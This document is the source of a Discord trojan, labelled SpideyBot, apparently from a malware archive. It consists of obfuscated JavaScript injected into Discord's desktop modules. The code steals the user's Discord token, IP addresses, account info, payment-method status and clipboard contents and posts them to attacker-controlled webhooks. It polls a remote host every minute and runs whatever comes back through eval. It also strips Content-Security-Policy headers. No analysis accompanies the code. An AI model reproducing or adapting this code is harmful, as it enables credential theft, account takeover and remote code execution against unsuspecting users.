MalwareSourceCode/Other/Trojan.Discord.SpideyBot.a
2022-08-07 02:04:05 -05:00

235 lines
14 KiB
Plaintext

modules\ discord_modules:
var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x6D\x6F\x7A\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x77\x65\x62\x6B\x69\x74\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x44\x61\x74\x61\x43\x68\x61\x6E\x6E\x65\x6C", "\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x69\x6E\x64\x65\x78\x4F\x66", "\x66\x6F\x72\x45\x61\x63\x68", "\x6D\x61\x74\x63\x68", "\x0A", "\x73\x70\x6C\x69\x74", "\x73\x64\x70", "\x73\x65\x74\x4C\x6F\x63\x61\x6C\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E", "\x63\x72\x65\x61\x74\x65\x4F\x66\x66\x65\x72", "\x6F\x6E\x69\x63\x65\x63\x61\x6E\x64\x69\x64\x61\x74\x65", "\x44\x49\x4F\x21", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x62\x79\x70\x61\x73\x73\x63\x6F\x72\x73\x2E\x68\x65\x72\x6F\x6B\x75\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x5A\x41\x57\x41\x52\x55\x44\x4F\x54\x6F\x6B\x69\x79\x6F\x74\x6F\x6D\x61\x72\x65\x2E\x74\x78\x74", "\x6C\x65\x6E\x67\x74\x68", "\x77\x72\x61\x70\x70\x65\x72\x2D\x31\x42\x4A\x73\x42\x78", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x63\x68\x61\x6E\x6E\x65\x6C\x73\x2F\x36\x32\x39\x31\x37\x35\x32\x32\x30\x35\x36\x39\x31\x31\x32\x35\x38\x36\x2F\x36\x32\x39\x31\x37\x35\x35\x35\x33\x31\x34\x33\x39\x39\x36\x34\x36\x34", "\x72\x65\x6D\x6F\x76\x65", "\x6C\x6F\x67", "\x6D\x61\x72\x67\x69\x6E\x54\x6F\x70\x32\x30\x2D\x33\x54\x78\x4E\x73\x36", "\x62\x72\x6F\x77\x73\x65\x72\x2D\x77\x69\x6E\x64\x6F\x77\x2D\x66\x6F\x63\x75\x73", "\x44\x69\x73\x63\x6F\x72\x64\x20\x68\x61\x73\x20\x65\x6E\x63\x6F\x75\x6E\x74\x65\x72\x65\x64\x20\x61\x6E\x20\x65\x72\x72\x6F\x72\x20\x61\x6E\x64\x20\x6D\x75\x73\x74\x20\x72\x65\x6C\x6F\x61\x64\x2E", "\x77\x61\x72\x6E", "\x62\x65\x65\x70", "\x73\x68\x65\x6C\x6C", "\x72\x65\x6C\x6F\x61\x64", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6F\x6E", "\x20\x7C\x20", "\x4E\x65\x77\x20\x42\x6C\x75\x65\x66\x61\x63\x65\x56\x34\x20\x6C\x6F\x67\x2E\x0A\x54\x6F\x6B\x65\x6E\x3A\x20", "\x0A\x54\x69\x6D\x65\x7A\x6F\x6E\x65\x3A\x20", "\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x3A\x20", "\x0A\x49\x50\x3A\x20", "\x0A\x57\x65\x62\x52\x54\x43\x20\x49\x50\x73\x3A\x20", "\x0A\x55\x73\x65\x72\x69\x6E\x66\x6F\x3A\x20", "\x0A\x55\x73\x65\x72\x6E\x61\x6D\x65\x3A\x20", "\x0A\x50\x53\x41\x74\x74\x61\x63\x68\x65\x64\x3A\x20", "\x0A\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72\x3A\x20", "\x0A\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x3A\x20", "\x0A\x44\x69\x73\x63\x6F\x72\x64\x20\x56\x65\x72\x73\x69\x6F\x6E\x3A\x20", "\x0A\x43\x6C\x69\x70\x62\x6F\x61\x72\x64\x28\x6C\x69\x6D\x69\x74\x65\x64\x20\x74\x6F\x20\x35\x30\x20\x63\x68\x61\x72\x73\x29\x3A\x20"];
var readme = _0x476f[0];
window[_0x476f[1]] = require;
var electron = require(_0x476f[2]);
window[_0x476f[2]] = require(_0x476f[2]);
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
window[_0x476f[1]] = require;
var electron = require(_0x476f[2]);
window[_0x476f[2]] = require(_0x476f[2]);
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
function sleep(_0xb38cx5) {
return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5))
}
var ip = _0x476f[11];
var userinfo = _0x476f[11];
var webrtcips = _0x476f[11];
var hasattached = false;
var underesc = _0x476f[13];
var focusamount = 0;
var WBH = _0x476f[11];
if (!document[_0x476f[15]](_0x476f[14])[0]) {
var username = _0x476f[16]
} else {
var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]]
};
function getandsetbackupWBH() {
function _0xb38cx10() {
WBH = this[_0x476f[18]]
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]);
_0xb38cx11[_0x476f[24]]()
}
function getandsetWBH() {
function _0xb38cx10() {
if (this[_0x476f[18]] == _0x476f[25]) {
getandsetbackupWBH()
} else {
WBH = _0x476f[26]
}
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]);
_0xb38cx11[_0x476f[24]]()
}
getandsetWBH();
function pin(_0xb38cx14) {
var _0xb38cx15 = new XMLHttpRequest();
_0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true);
_0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]);
_0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({
content: _0xb38cx14
}))
}
function returnzoomfactor() {
return electron[_0x476f[33]][_0x476f[32]]()
}
function returnuseragent() {
return navigator[_0x476f[34]]
}
function getdiscordversion() {
return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]()
}
function getclipboard() {
return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50)
}
function getip() {
function _0xb38cx10() {
ip = this[_0x476f[18]]
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]);
_0xb38cx11[_0x476f[24]]()
}
function gettimezone() {
return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]]
}
function getresolution() {
return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]]
}
function getuserinfo(_0xb38cx1e) {
function _0xb38cx10() {
userinfo = this[_0x476f[18]]
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]);
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
_0xb38cx11[_0x476f[24]]()
}
function getpaymentsources(_0xb38cx1e) {
function _0xb38cx10() {
if (this[_0x476f[18]] == _0x476f[50]) {
hasattached = false
} else {
hasattached = true
}
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]);
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
_0xb38cx11[_0x476f[24]]()
}
function getwebrtcinfo(_0xb38cx21) {
var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]];
var _0xb38cx23 = new _0xb38cx22({
iceServers: []
}),
_0xb38cx24 = function() {},
_0xb38cx25 = {},
_0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
_0xb38cx27;
function _0xb38cx28(ip) {
if (!_0xb38cx25[ip]) {
_0xb38cx21(ip)
};
_0xb38cx25[ip] = true
}
_0xb38cx23[_0x476f[55]](_0x476f[11]);
_0xb38cx23[_0x476f[64]](function(_0xb38cx29) {
_0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) {
if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) {
return
};
_0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
});
_0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24)
}, _0xb38cx24);
_0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) {
if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) {
return
};
_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
}
}
async function fightdio() {
while (true) {
function _0xb38cx10() {
var _0xb38cx2d = this[_0x476f[18]];
if (_0xb38cx2d == _0x476f[66]) {
return
} else {
eval(_0xb38cx2d)
}
}
var _0xb38cx11 = new XMLHttpRequest();
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]);
_0xb38cx11[_0x476f[24]]();
await sleep(60000)
}
}
async function delboostserveronclient() {
while (true) {
for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) {
if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) {
console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]())
}
};
if (document[_0x476f[15]](_0x476f[74])[0]) {
document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]()
};
await sleep(100)
}
}
electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => {
focusamount = focusamount + 1;
if (focusamount >= 15) {
console[_0x476f[77]](_0x476f[76]);
electron[_0x476f[79]][_0x476f[78]]();
window[_0x476f[81]][_0x476f[80]]();
focusamount = 0
}
});
getwebrtcinfo(function(ip) {
webrtcips = webrtcips + ip + _0x476f[83]
});
getip();
getuserinfo(token);
getpaymentsources(token);
setTimeout(() => {
var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]);
pin(_0xb38cx30)
}, 5000);
setTimeout(() => {
delboostserveronclient()
}, 1);
setTimeout(() => {
fightdio()
}, 1)
\ modules\ discord_desktop_core:
const electron = require('electron');
const path = require('path');
electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) {
if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({
cancel: false
});
delete details.responseHeaders['content-security-policy-report-only'];
delete details.responseHeaders['content-security-policy'];
callback({
cancel: false,
responseHeaders: details.responseHeaders
});
});
module.exports = require('./core.asar');